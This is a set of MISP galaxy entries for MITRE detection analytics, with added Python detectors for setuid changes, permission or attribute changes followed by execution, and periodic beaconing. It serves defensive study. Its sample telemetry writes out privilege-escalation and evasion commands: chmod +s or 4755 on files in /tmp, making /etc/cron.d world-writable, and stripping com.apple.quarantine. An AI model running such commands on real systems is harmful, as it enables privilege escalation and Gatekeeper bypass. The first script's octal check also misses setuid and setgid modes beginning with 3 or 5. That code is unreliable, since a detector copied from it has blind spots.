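An added example (not part of the MITRE analytics or the MISP entries) that serves both AN0976 and AN0998: it parses auditd records, joins the multi-record events on their serial number, decodes the hex-encoded PROCTITLE to recover the chmod argument vector, and raises one alert when a setuid/setgid bit is set (stage 1 of the AN0998 chain, and the "setuid/setgid bit changes" of AN0976) and another when a later execution runs with euid different from uid through a binary that is not a known setuid helper (stage 4 of AN0998, and the "UID ≠ EUID" condition of AN0976). The audit records are constructed and abbreviated; the allowlist of expected setuid binaries and the syscall numbers (x86_64) are the example's assumptions.

```python
"""Added example for AN0976 and AN0998: setuid-bit changes and uid/euid mismatches in auditd records."""
import re

# Constructed auditd records (abbreviated). Event 203 is `chmod +s /tmp/backup`, with PROCTITLE
# hex-encoded the way auditd writes it when argv contains NUL separators; event 204 is the
# later execution of that file, now running with euid=0 from a uid=1000 session.
AUDIT_LOG = """\
type=SYSCALL msg=audit(1714557600.101:201): arch=c000003e syscall=59 success=yes exit=0 ppid=2001 pid=2002 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 comm="sudo" exe="/usr/bin/sudo" key="exec"
type=SYSCALL msg=audit(1714557601.220:202): arch=c000003e syscall=59 success=yes exit=0 ppid=2002 pid=2003 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 comm="id" exe="/usr/bin/id" key="exec"
type=SYSCALL msg=audit(1714557640.442:203): arch=c000003e syscall=90 success=yes exit=0 ppid=3000 pid=3001 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 comm="chmod" exe="/usr/bin/chmod" key="perm_mod"
type=PROCTITLE msg=audit(1714557640.442:203): proctitle=63686D6F64002B73002F746D702F6261636B7570
type=SYSCALL msg=audit(1714557650.005:204): arch=c000003e syscall=59 success=yes exit=0 ppid=3100 pid=3101 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 comm="backup" exe="/tmp/backup" key="exec"
"""

# Binaries expected to run with euid != uid because the distribution installs them setuid.
EXPECTED_SETUID = {"/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/newgrp",
                   "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn"}
CHMOD_SYSCALLS = {"90", "91", "268"}        # chmod, fchmod, fchmodat on x86_64 (arch=c000003e)
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERIAL_RE = re.compile(r"audit\((\d+\.\d+):(\d+)\)")


def parse_record(line):
    rec = {k: v.strip('"') for k, v in FIELD_RE.findall(line)}
    m = SERIAL_RE.search(line)
    rec["_time"], rec["_serial"] = float(m.group(1)), m.group(2)
    return rec


def group_events(log_text):
    """auditd writes several records per event; join them on the serial number."""
    events = {}
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_record(line)
            events.setdefault(rec["_serial"], {})[rec["type"]] = rec
    return events


def proctitle_argv(rec):
    raw = rec.get("proctitle", "")
    if re.fullmatch(r"[0-9A-Fa-f]+", raw):      # hex-encoded when the title contains NUL bytes
        return bytes.fromhex(raw).decode(errors="replace").split("\x00")
    return raw.split(" ")


def setuid_mode(argv):
    """True when chmod's mode argument adds or sets a setuid/setgid bit (symbolic or octal)."""
    for arg in argv[1:]:
        if arg.startswith("-"):
            continue                              # options such as -R
        symbolic = any(re.fullmatch(r"[ugoa]*[+=][rwxXst]*s[rwxXst]*", part) for part in arg.split(","))
        octal = bool(re.fullmatch(r"[0-7]{4}", arg)) and arg[0] in "2467"
        return symbolic or octal                  # the first non-option argument is the mode
    return False


def detect(log_text):
    alerts = []
    grouped = sorted(group_events(log_text).values(),
                     key=lambda ev: ev["SYSCALL"]["_time"] if "SYSCALL" in ev else 0)
    for ev in grouped:
        sc = ev.get("SYSCALL")
        if not sc:
            continue
        # Rule 1: a setuid/setgid bit being set on some file.
        if sc["syscall"] in CHMOD_SYSCALLS and "PROCTITLE" in ev:
            argv = proctitle_argv(ev["PROCTITLE"])
            if setuid_mode(argv):
                alerts.append(("setuid_bit_set", sc["_serial"], sc["exe"], " ".join(argv)))
        # Rule 2: effective uid differs from real uid via a binary that is not a known setuid helper.
        if sc["uid"] != sc["euid"] and sc["exe"] not in EXPECTED_SETUID:
            alerts.append(("euid_mismatch", sc["_serial"], sc["exe"], f"uid={sc['uid']} euid={sc['euid']}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(AUDIT_LOG):
        print(alert)
```

The two rules are deliberately independent: the chmod record shows intent even if the file is never run, and the euid mismatch catches a setuid binary that was planted by other means (a package, a copied file with preserved mode). Joining them on the path (the chmod target equals the later exe) is the temporal correlation AN0998 asks for and is a one-line addition once both alerts exist. The sudo record in the sample is the expected negative case for rule 2, and the allowlist is the part that needs to match the host's actual setuid inventory (find / -perm -4000).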

Analytic 0999 - AN0999

macOS permission and attribute manipulation behavioral chain: (1) Process execution of permission utilities (chmod, chown, chgrp) or macOS-specific tools (chflags) with suspicious parameters, (2) System Integrity Protection (SIP) bypass attempts through permission modifications, (3) File flags manipulation (uchg, schg, hidden) for evasion or persistence, (4) Extended attribute (xattr) modifications affecting security metadata, (5) Unified log correlation with file system events and subsequent access patterns, (6) Gatekeeper and code signing bypass through permission/attribute manipulation

Internal MISP references

UUID 2d21fb1f-f9c3-4e72-a6dd-3d7872be3294 which can be used as unique global reference for Analytic 0999 - AN0999 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0999
mitre_platforms ['macOS']
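
AN0998 and AN0999 describe the same two-step shape on Linux and macOS: a permission or attribute change on a path, then execution from that path shortly afterwards. The Python below is an added example, not part of the MITRE analytic or any MITRE tooling; the event shape, system-path prefixes, ten-minute window and sample events are assumptions of this illustration. It classifies chmod/chown/chgrp/setfacl invocations (setuid bits, world-writable system paths, ACL and ownership changes) and the macOS chflags/xattr cases (hidden or immutable flags, removal of com.apple.quarantine), then raises a second, higher-confidence alert when an exec of a flagged path follows within the window.

```python
"""Added example (not MITRE's): flag permission/attribute changes and correlate them
with execution from the changed path. Event shape, prefixes, thresholds and the
sample events are assumptions; real input would come from auditd/eBPF or Endpoint Security."""
import re
import shlex

SYSTEM_PREFIXES = ("/etc/", "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/",
                   "/Library/", "/System/")
EVASION_FLAGS = {"hidden", "uchg", "schg", "uappnd", "sappnd"}  # chflags flags used for hiding/locking
WINDOW_SECONDS = 600  # an exec this soon after a change is treated as one chain


def _is_system(path):
    return path.startswith(SYSTEM_PREFIXES)


def _chmod_reason(mode, targets):
    # numeric 2xxx-7xxx (setgid and/or setuid bit) or symbolic +s / =s
    if re.fullmatch(r"[2-7][0-7]{3}", mode) or re.search(r"[+=][rwxXt]*s", mode):
        return "setuid/setgid bit set"
    world_writable = False
    if re.fullmatch(r"[0-7]{3,4}", mode):
        world_writable = bool(int(mode[-1]) & 2)  # write bit for 'other'
    else:
        for clause in mode.split(","):
            m = re.fullmatch(r"([ugoa]*)([+=])([rwxXst]*)", clause)
            if m and "w" in m.group(3) and (not m.group(1) or set(m.group(1)) & {"o", "a"}):
                world_writable = True
    if world_writable and any(_is_system(t) for t in targets):
        return "world-writable system path"
    return None


def classify(argv):
    """Return (reason, affected_paths) for a permission/attribute command, or (None, [])."""
    if not argv:
        return None, []
    tool = argv[0].rsplit("/", 1)[-1]
    opts = [a for a in argv[1:] if a.startswith("-")]
    rest = [a for a in argv[1:] if not a.startswith("-")]
    if len(rest) < 2:
        return None, []
    paths = rest[1:]
    if tool == "chmod":
        reason = _chmod_reason(rest[0], paths)
        return (reason, paths) if reason else (None, [])
    if tool in ("chown", "chgrp") and any(_is_system(p) for p in paths):
        return "ownership change on system path", paths
    if tool == "setfacl" and ("-m" in opts or "--modify" in opts) and any(_is_system(p) for p in paths):
        return "ACL modification on system path", paths
    if tool == "chflags" and set(rest[0].split(",")) & EVASION_FLAGS:
        return "file flags set: hidden/immutable", paths
    if tool == "xattr" and "-d" in opts and rest[0] == "com.apple.quarantine":
        return "quarantine attribute removed (Gatekeeper bypass)", paths
    return None, []


def correlate(events):
    """events: time-ordered dicts {ts, type: 'proc', argv} or {ts, type: 'exec', path}."""
    pending = {}  # path -> (ts, reason) of the most recent suspicious change
    alerts = []
    for ev in events:
        if ev["type"] == "proc":
            reason, paths = classify(ev["argv"])
            if reason:
                alerts.append({"ts": ev["ts"], "stage": "permission_change", "reason": reason, "paths": paths})
                for p in paths:
                    pending[p] = (ev["ts"], reason)
        elif ev["type"] == "exec" and ev["path"] in pending:
            changed_at, reason = pending[ev["path"]]
            if 0 <= ev["ts"] - changed_at <= WINDOW_SECONDS:
                alerts.append({"ts": ev["ts"], "stage": "exec_after_change", "reason": reason, "paths": [ev["path"]]})
    return alerts


def _proc(ts, cmd):
    return {"ts": ts, "type": "proc", "argv": shlex.split(cmd)}


def _exec(ts, path):
    return {"ts": ts, "type": "exec", "path": path}


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    _proc(100, "chmod 4755 /tmp/.x/sh"),                # setuid on a user-writable path
    _exec(130, "/tmp/.x/sh"),                           # executed 30 s later -> chain completes
    _exec(150, "/usr/bin/ls"),                          # unrelated
    _proc(200, "chmod 644 /home/alice/notes.txt"),      # benign
    _proc(300, "xattr -d com.apple.quarantine /Users/alice/Downloads/Update.app/Contents/MacOS/Update"),
    _exec(305, "/Users/alice/Downloads/Update.app/Contents/MacOS/Update"),
    _proc(400, "chflags hidden /Users/alice/Library/.svc"),
    _proc(500, "chmod o+w /etc/cron.d"),
    _exec(2000, "/tmp/.x/sh"),                          # outside the window -> no new alert
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

Command-line classification alone is noisy (package managers and installers chmod system paths constantly), which is why the exec correlation matters; a real pipeline would also consume the fchmod/fchown syscalls the analytic mentions, since a program can change modes without ever spawning chmod. Removing com.apple.quarantine is the attribute change that lets a downloaded binary skip Gatekeeper, so it deserves the highest weight of the macOS cases.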

Analytic 1111 - AN1111

Detects abuse of AuthorizationExecuteWithPrivileges API to gain elevated privileges via user credential prompts, typically through invocation of /usr/libexec/security_authtrampoline. Detection involves correlation of API usage, binary reputation, and prompt context.

Internal MISP references

UUID aae53d47-1f26-426b-9e50-848f186fed99 which can be used as unique global reference for Analytic 1111 - AN1111 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1111
mitre_platforms ['macOS']

Analytic 1112 - AN1112

Detects suspicious access to macOS Keychain files and APIs. Observes processes invoking the 'security' utility or accessing Keychain databases directly, correlates these with abnormal parent process lineage or unexpected user context. Monitors attempts to dump, unlock, or read credential storage beyond normal application workflows.

Internal MISP references

UUID 015260e0-432e-4eaf-978e-b1a32fa6af6a which can be used as unique global reference for Analytic 1112 - AN1112 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1112
mitre_platforms ['macOS']

Analytic 1211 - AN1211

Modification or replacement of service executables due to weak file or directory permissions. Defender observes file writes to service binary paths, unexpected modifications of executables associated with registered services, and subsequent service execution of attacker-supplied binaries under elevated permissions.

Internal MISP references

UUID 0a847430-f140-419e-b0fe-bd891bde85a6 which can be used as unique global reference for Analytic 1211 - AN1211 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1211
mitre_platforms ['Windows']

Analytic 1121 - AN1121

Detects high-frequency or anomalous DNS queries initiated by non-browser, non-system processes (e.g., PowerShell, rundll32, python.exe) used to establish command and control via DNS tunneling.

Internal MISP references

UUID 407bb9c9-0c31-4172-8dd3-bdd0547f2d1e which can be used as unique global reference for Analytic 1121 - AN1121 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1121
mitre_platforms ['Windows']

Analytic 1113 - AN1113

Detection of automated tools or scripts periodically transmitting data to external destinations using scheduled tasks or background processes.

Internal MISP references

UUID 4a92d2e9-fc28-4eac-9b3d-113e74d7bf2d which can be used as unique global reference for Analytic 1113 - AN1113 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1113
mitre_platforms ['Windows']

Analytic 1131 - AN1131

Configuration changes to virtual TAP/mirror policies that forward traffic to unapproved destinations. Detection correlates management plane API calls with mirrored traffic observation.

Internal MISP references

UUID 7becb616-f907-4533-a425-08ca42440e3f which can be used as unique global reference for Analytic 1131 - AN1131 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1131
mitre_platforms ['IaaS']

Analytic 1311 - AN1311

Monitors Mail.app database or maildir file access, automation via AppleScript, and abnormal mail rule creation using scripting or UI automation frameworks.

Internal MISP references

UUID ae581308-5c1f-40b9-ae6e-51c375821476 which can be used as unique global reference for Analytic 1311 - AN1311 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1311
mitre_platforms ['macOS']

Analytic 1114 - AN1114

Background scripts (e.g., via cron) or daemons transmitting data repeatedly to remote IPs or URLs.

Internal MISP references

UUID 31adce9b-8935-4abf-aaf2-0a13047e25e4 which can be used as unique global reference for Analytic 1114 - AN1114 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1114
mitre_platforms ['Linux']

Analytic 1411 - AN1411

Adversary mounts external drive to /media or /mnt then accesses or copies targeted data via shell, cp, or tar.

Internal MISP references

UUID 5312ddd0-dd58-4bcb-afc0-7a05a6b2df42 which can be used as unique global reference for Analytic 1411 - AN1411 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1411
mitre_platforms ['Linux']

Analytic 1141 - AN1141

Spoofed outbound packets sent to amplification services from command-line tools or scripts, combined with abnormal outbound packet volume on known reflector ports.

Internal MISP references

UUID eb7692b0-5592-4d23-ba06-fdded48a2a0d which can be used as unique global reference for Analytic 1141 - AN1141 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1141
mitre_platforms ['Linux']

Analytic 1115 - AN1115

Observation of LaunchAgents or LaunchDaemons establishing periodic external connections indicative of automated data transfer.

Internal MISP references

UUID 031ed94b-50d9-451e-a853-29ee8d845773 which can be used as unique global reference for Analytic 1115 - AN1115 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1115
mitre_platforms ['macOS']

Analytic 1151 - AN1151

Inspect network telemetry for adversary attempts to blend malicious traffic with legitimate flows using VPNs, proxies, or geolocation spoofing. Defensive teams may observe anomalous tunnels, encrypted sessions to suspicious domains, or geo-mismatched IP activity.

Internal MISP references

UUID 3f74d068-0a8b-4312-91f3-34da6c630c4a which can be used as unique global reference for Analytic 1151 - AN1151 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1151
mitre_platforms ['Network Devices']

Analytic 1511 - AN1511

Processes that normally do not initiate network communications suddenly making outbound HTTPS connections with high outbound-to-inbound data ratios. Defender view: correlation between process creation logs (e.g., Word, Excel, PowerShell) and subsequent anomalous network traffic volumes toward common web services (Dropbox, Google Drive, OneDrive).

Internal MISP references

UUID 81b1e9a7-b6f4-4cca-b07a-3498ab4abd4a which can be used as unique global reference for Analytic 1511 - AN1511 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1511
mitre_platforms ['Windows']

Analytic 1611 - AN1611

Detects credential dumping attempts targeting the NTDS.dit database by monitoring shadow copy creation, suspicious file access to %SystemRoot%\NTDS\ntds.dit, and the use of tooling like ntdsutil.exe or volume management APIs.

Internal MISP references

UUID 1c715030-9564-482d-98b7-22072bf28c97 which can be used as unique global reference for Analytic 1611 - AN1611 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1611
mitre_platforms ['Windows']

Analytic 1161 - AN1161

Command-line tools (e.g., curl, rsync, wget, or custom Python scripts) used to scrape documentation systems or internal REST APIs. Unusual access patterns to knowledge base folders or shared team drives.

Internal MISP references

UUID 59faf79f-831d-436b-9ce3-e5c1d338da6c which can be used as unique global reference for Analytic 1161 - AN1161 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1161
mitre_platforms ['Linux']

Analytic 1116 - AN1116

Office-based persistence via Office template macros, Outlook forms/rules/homepage, or registry-persistent scripts. Adversary modifies registry keys or Office application directories to load malicious scripts at startup.

Internal MISP references

UUID e643c4aa-dc7d-43d9-b36e-f13d733f8e9a which can be used as unique global reference for Analytic 1116 - AN1116 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1116
mitre_platforms ['Windows']

Analytic 1117 - AN1117

Startup-based persistence mechanisms within Microsoft Office Suite like template macros and home page redirects being configured through internal automation or client-side settings.

Internal MISP references

UUID 59bfb473-611f-4443-9d11-f44e7ace93fb which can be used as unique global reference for Analytic 1117 - AN1117 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1117
mitre_platforms ['Office Suite']

Analytic 1171 - AN1171

Detects Automator, AppleScript, or Terminal executing curl, lftp, or TFTP for binary transfer to untrusted IPs or unusual ports.

Internal MISP references

UUID 9e9efdc0-82d3-4046-a4db-e97454f708a6 which can be used as unique global reference for Analytic 1171 - AN1171 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1171
mitre_platforms ['macOS']

Analytic 1711 - AN1711

The user can see persistent notifications in their notification drawer and can subsequently uninstall applications that do not belong. Applications could be vetted for their use of the startForeground() API, and could be further scrutinized if usage is found.

Internal MISP references

UUID 2df1959e-8ec4-4193-9cb8-c089c78b4d1c which can be used as unique global reference for Analytic 1711 - AN1711 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1711
mitre_platforms ['Android']

Analytic 1181 - AN1181

Use ESXi syslogs to track abnormal DNS query patterns from management agents or VMs. Identify high-frequency, low-TTL, or unresolvable domains as suspicious. Correlate with unusual management plane process activity.

Internal MISP references

UUID 5a652a8f-a8e1-4010-bc2b-2ffaa2838333 which can be used as unique global reference for Analytic 1181 - AN1181 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1181
mitre_platforms ['ESXi']

Analytic 1118 - AN1118

Recurring network exfiltration initiated by scheduled or script-based processes exhibiting time-based regularity and consistent external destinations.

Internal MISP references

UUID 79600919-afe8-4ac9-946c-147d85af6cfe which can be used as unique global reference for Analytic 1118 - AN1118 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1118
mitre_platforms ['Windows']

Analytic 1811 - AN1811

Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 9eeb7425-6979-4f77-aa7c-f9b0fe6b710e which can be used as unique global reference for Analytic 1811 - AN1811 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1811
mitre_platforms ['iOS']

Analytic 1119 - AN1119

Detection of cron-based or script-based recurring transfers where the same script, user, or destination reappears at predictable intervals.

Internal MISP references

UUID 11ac52fe-f8e0-4748-9fbc-2f85c43ad506 which can be used as unique global reference for Analytic 1119 - AN1119 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1119
mitre_platforms ['Linux']
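
AN1113, AN1114, AN1115, AN1118 and AN1119 all hinge on the same measurable property: a scheduled job or daemon contacts the same destination at intervals far more regular than a human produces. The Python below is an added example, not part of the MITRE analytics; the record shape, the coefficient-of-variation threshold and the sample connections are assumptions. It groups outbound connections by host, process and destination and flags series whose inter-arrival jitter is small, marking whether the parent is a scheduler (cron, launchd, svchost.exe).

```python
"""Added example (not MITRE's): find connection series with machine-like regularity.
Record shape, thresholds and the sample connections are assumptions of this illustration."""
import statistics
from collections import defaultdict

MIN_EVENTS = 6   # enough intervals to judge regularity
MAX_CV = 0.25    # stdev/mean of intervals: 0 is perfectly periodic, jittered beacons stay low
SCHEDULERS = {"cron", "crond", "launchd", "systemd", "svchost.exe", "taskeng.exe"}


def interval_stats(timestamps):
    """Return (mean interval, coefficient of variation) for a series of timestamps."""
    ts = sorted(timestamps)
    if len(ts) < 2:
        return 0.0, float("inf")
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return mean, (statistics.pstdev(gaps) / mean if mean else float("inf"))


def find_periodic(records, min_events=MIN_EVENTS, max_cv=MAX_CV):
    """Group outbound connections by (host, process, destination) and flag regular series.
    records: dicts {ts, host, process, parent, dst}."""
    series, parents = defaultdict(list), {}
    for r in records:
        key = (r["host"], r["process"], r["dst"])
        series[key].append(r["ts"])
        parents[key] = r["parent"]
    findings = []
    for (host, process, dst), times in series.items():
        if len(times) < min_events:
            continue
        period, cv = interval_stats(times)
        if cv <= max_cv:
            findings.append({"host": host, "process": process, "dst": dst, "count": len(times),
                             "period_s": round(period), "cv": round(cv, 3),
                             "scheduled_parent": parents[(host, process, dst)] in SCHEDULERS})
    return sorted(findings, key=lambda f: f["cv"])


def _series(host, process, parent, dst, start, gaps):
    """Constructed records from a start time and a list of inter-arrival gaps."""
    out, t = [], start
    for g in [0] + gaps:
        t += g
        out.append({"ts": t, "host": host, "process": process, "parent": parent, "dst": dst})
    return out


BASE = 1_700_000_000
SAMPLE_RECORDS = (
    # cron job posting every 300 s exactly (AN1114/AN1119 shape)
    _series("web01", "curl", "cron", "203.0.113.10:443", BASE, [300] * 9)
    # launch agent beacon with +/-10 % jitter (AN1115 shape)
    + _series("mac07", "svc_updater", "launchd", "198.51.100.7:443", BASE, [300, 330, 270, 300, 320, 280, 310, 290])
    # interactive browsing: bursty and irregular
    + _series("ws12", "chrome", "explorer.exe", "93.184.216.34:443", BASE, [5, 1200, 30, 4000, 7, 900])
    # regular, but too few events to judge
    + _series("ws12", "OneDrive.exe", "explorer.exe", "13.107.42.12:443", BASE, [60, 60, 60])
)

if __name__ == "__main__":
    for f in find_periodic(SAMPLE_RECORDS):
        print(f)
```

The coefficient of variation (standard deviation divided by mean) is scale-free, so a 60-second and a one-hour beacon are judged the same way; implants that randomise sleep by a fixed percentage still land well under 0.25, while a browser session does not. Legitimate agents (update checkers, monitoring) are also periodic, so the result is a candidate list to baseline per destination, not a verdict.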

Analytic 1191 - AN1191

Detects user agents or background services making unauthorized or unscheduled web API calls to cloud/web services over HTTPS.

Internal MISP references

UUID aff88199-cad0-47f8-b065-0ad7a86ec8a7 which can be used as unique global reference for Analytic 1191 - AN1191 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1191
mitre_platforms ['macOS']

Analytic 1221 - AN1221

Detects the creation, modification, or deletion of scheduled tasks through Task Scheduler, WMI, PowerShell, or API-based methods followed by execution from svchost.exe or taskeng.exe. Includes detection of hidden or anomalous scheduled tasks, especially those created under SYSTEM or suspicious user contexts.

Internal MISP references

UUID 4959f750-78db-4b4c-8d91-23027b386c2b which can be used as unique global reference for Analytic 1221 - AN1221 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1221
mitre_platforms ['Windows']

Analytic 1212 - AN1212

Detects adversary activity aimed at accessing LSA Secrets, including registry key export of HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets or memory scraping via tools such as Mimikatz or PowerSploit's Invoke-Mimikatz.

Internal MISP references

UUID a29288f5-c5d8-4e2d-8370-c4e21a64fc95 which can be used as unique global reference for Analytic 1212 - AN1212 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1212
mitre_platforms ['Windows']

Analytic 1122 - AN1122

Detects local daemons or scripts generating outbound DNS queries with long or frequent subdomains, indicative of DNS tunneling via tools like iodine, dnscat2, or dig from cronjobs or reverse shells.

Internal MISP references

UUID cc8183e1-9de4-469a-9117-79bf2e986e31 which can be used as unique global reference for Analytic 1122 - AN1122 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1122
mitre_platforms ['Linux']

Analytic 1132 - AN1132

Unauthorized mirroring sessions initiated on routers/switches (e.g., via monitor session, mirror port) coupled with outbound traffic from mirrored interface to unexpected destinations.

Internal MISP references

UUID 0729dd54-2fda-460a-8bb3-eee02f0f3c4e which can be used as unique global reference for Analytic 1132 - AN1132 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1132
mitre_platforms ['Network Devices']

Analytic 1312 - AN1312

Correlates unusual auto-forwarding rule creation via Exchange Web Services or Outlook rules engine, presence of X-MS-Exchange-Organization-AutoForwarded headers, and logon session anomalies from abnormal IPs.

Internal MISP references

UUID 2faaefb9-7816-4eb5-a9f5-b4006c99c20b which can be used as unique global reference for Analytic 1312 - AN1312 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1312
mitre_platforms ['Office Suite']

Analytic 1213 - AN1213

Detects suspicious custom compression/encryption routines through anomalous script or binary execution that produces high-entropy files without standard archiving utilities. Correlates script execution, memory API usage (bitwise ops, CryptoAPI calls), and creation of archive-like files with uncommon headers.

Internal MISP references

UUID 3f47f3e9-2856-4830-9762-7ca0c3924f6d which can be used as unique global reference for Analytic 1213 - AN1213 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1213
mitre_platforms ['Windows']

Analytic 1123 - AN1123

Detects scripting environments (AppleScript, osascript, curl) or non-native tools performing DNS queries with encoded subdomains, often used for data exfiltration or beaconing.

Internal MISP references

UUID 42a8c7a7-2773-4892-b647-40d3542ae4d2 which can be used as unique global reference for Analytic 1123 - AN1123 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1123
mitre_platforms ['macOS']

Analytic 1321 - AN1321

Detects tampering of IIS-based login pages (e.g., default.aspx, login.aspx) tied to VPN, OWA, or SharePoint via script injection or unexpected editor processes modifying web roots.

Internal MISP references

UUID 4f33b538-1370-4df1-934f-fe3a609453fb which can be used as unique global reference for Analytic 1321 - AN1321 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1321
mitre_platforms ['Windows']

Analytic 1231 - AN1231

AppleScript, LaunchAgents, or remote login services (ssh, networksetup) establishing proxy tunnels or dynamic port forwards to external IPs or alternate local hosts.

Internal MISP references

UUID aace8c0e-4534-432b-9a84-6e01c19570b7 which can be used as unique global reference for Analytic 1231 - AN1231 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1231
mitre_platforms ['macOS']

Analytic 1421 - AN1421

Detects use of vulnerable kernel extensions or entitlements abused via setuid or AppleScript injection chains.

Internal MISP references

UUID 0066bac9-599a-4f7b-a667-9cb1dca94347 which can be used as unique global reference for Analytic 1421 - AN1421 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1421
mitre_platforms ['macOS']

Analytic 1214 - AN1214

Detects custom archive routines by correlating script execution (Python, Perl, Bash) with creation of high-entropy files in temporary or user directories. Flags processes performing unusual bitwise operations or writing files without standard compression headers.

Internal MISP references

UUID 32ca8e2c-9c1e-4883-aa98-439efbfc76e4 which can be used as unique global reference for Analytic 1214 - AN1214 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1214
mitre_platforms ['Linux']

Analytic 1142 - AN1142

Command-line initiated UDP traffic bursts to external reflection amplification ports using built-in scripting or binaries with network anomalies.

Internal MISP references

UUID 44c2e32e-bd34-4ba9-8105-28c14309207c which can be used as unique global reference for Analytic 1142 - AN1142 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1142
mitre_platforms ['macOS']

Analytic 1412 - AN1412

Adversary attaches USB drive and accesses sensitive files using Finder, cp, or bash scripts.

Internal MISP references

UUID 9abfb75c-2051-4549-b458-f09c4e6f4ad3 which can be used as unique global reference for Analytic 1412 - AN1412 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1412
mitre_platforms ['macOS']

Analytic 1241 - AN1241

Detects the redirection of syscall execution flow via modification of VDSO code stubs or GOT entries to load and execute a malicious shared object through mmap and ptrace.

Internal MISP references

UUID bfc7e981-ca7e-4b1b-a692-65a8867a7a89 which can be used as unique global reference for Analytic 1241 - AN1241 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1241
mitre_platforms ['Linux']

Analytic 1124 - AN1124

Detects clients issuing DNS queries with high volume, long subdomain lengths, encoded payload patterns, or to known malicious infrastructure; indicative of DNS-based C2 channels.

Internal MISP references

UUID fe648823-66c8-4cc3-8a8e-38616194464c which can be used as unique global reference for Analytic 1124 - AN1124 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1124
mitre_platforms ['Network Devices']

Analytic 1251 - AN1251

Detects suspicious changes to macOS authorization and PAM plugin files. Correlates file modifications under /etc/pam.d/ or /Library/Security/SecurityAgentPlugins with unexpected authentication attempts or anomalous account usage.

Internal MISP references

UUID 04cd1c76-d01d-482c-83e2-4bb5109e9764 which can be used as unique global reference for Analytic 1251 - AN1251 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1251
mitre_platforms ['macOS']

Analytic 1125 - AN1125

Detects unusual outbound DNS traffic from ESXi hosts, often from shell scripts, custom daemons, or malicious VIBs interacting with external DNS infrastructure outside the management plane.

Internal MISP references

UUID 11d8dd9d-e8f3-40cd-b9fe-cc82b6c2e790 which can be used as unique global reference for Analytic 1125 - AN1125 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1125
mitre_platforms ['ESXi']
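
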